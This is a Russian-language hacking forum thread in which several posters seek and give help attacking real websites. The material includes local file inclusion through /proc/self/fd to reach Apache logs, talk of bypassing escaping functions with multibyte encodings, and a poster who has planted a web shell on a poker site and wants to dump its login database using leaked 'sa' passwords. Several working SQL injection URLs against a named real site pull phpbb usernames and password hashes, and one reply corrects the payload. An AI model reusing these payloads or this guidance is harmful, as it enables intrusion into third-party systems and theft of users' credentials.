Скажите от чего зависит цифра в имени ссылки на лог апача? /proc/self/fd/2 /proc/self/fd/11 мне нужно чтоб при инклуде сразу добраться до логов.
Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)
Тесть: (эта функция уже не рекомендуется к использованию, а функция mysql_real_escape_string проверяет кодировку текущего соединения, так что у неё меньше проблем с подобным уязвимостями.) Code: /* {{{ proto string mysql_escape_string(string to_be_escaped) Escape string for mysql query */ PHP_FUNCTION(mysql_escape_string) { char *str; int str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { return; } /* assume worst case situation, which is 2x of the original string. * we don't realloc() down to the real size since it'd most probably not * be worth it */ Z_STRVAL_P(return_value) = (char *) safe_emalloc(str_len, 2, 1); Z_STRLEN_P(return_value) = mysql_escape_string(Z_STRVAL_P(return_value), str, str_len); Z_TYPE_P(return_value) = IS_STRING; if (MySG(trace_mode)){ php_error_docref("function.mysql-real-escape-string" TSRMLS_CC, E_DEPRECATED, "This function is deprecated; use mysql_real_escape_string() instead."); } } /* }}} */
Залил на один ресурс шелл от madneta прочитал файл msql-конфиг внём такая инфа objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;" objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;" Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost используя: логин: sa пасс:sas - не конектится, ошибка логин=sa;Password=ichsss - тоже самое попробывал зайти в каталог: С/msql_data_files/ там лежат папки баз от других сайтов на этом хосте но папки POKER нет ( В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов. Что посоветуете господа? Очень нужно слить базу, help somebody (новичок)
Вобщем так, для ясности и на глядности что и где: Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствует_pid/2, а там уже Code: ls -la /proc/цыфра_которой_соответствует_pid/fd/ итого 0 dr-x------ 2 apache apache 0 2010-04-07 14:04 ./ dr-xr-xr-x 7 apache apache 0 2010-04-07 13:56 ../ lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log ссылка на логи, а проинклудишь или нет, зависит от прав. UPD Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.
подобрал на сайте баблицу с логинами и пассами Code: http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273-- назнаю как извлечь user_id,username,user_password Code: http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables-- вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+0x70687062625f7573657273-- Делаю не получается =\ подскажите как правильно смотреть содержимое столбцов таблиц
_http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3a,username,user_password)+from+phpbb_users+limit+86,1--+
я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?
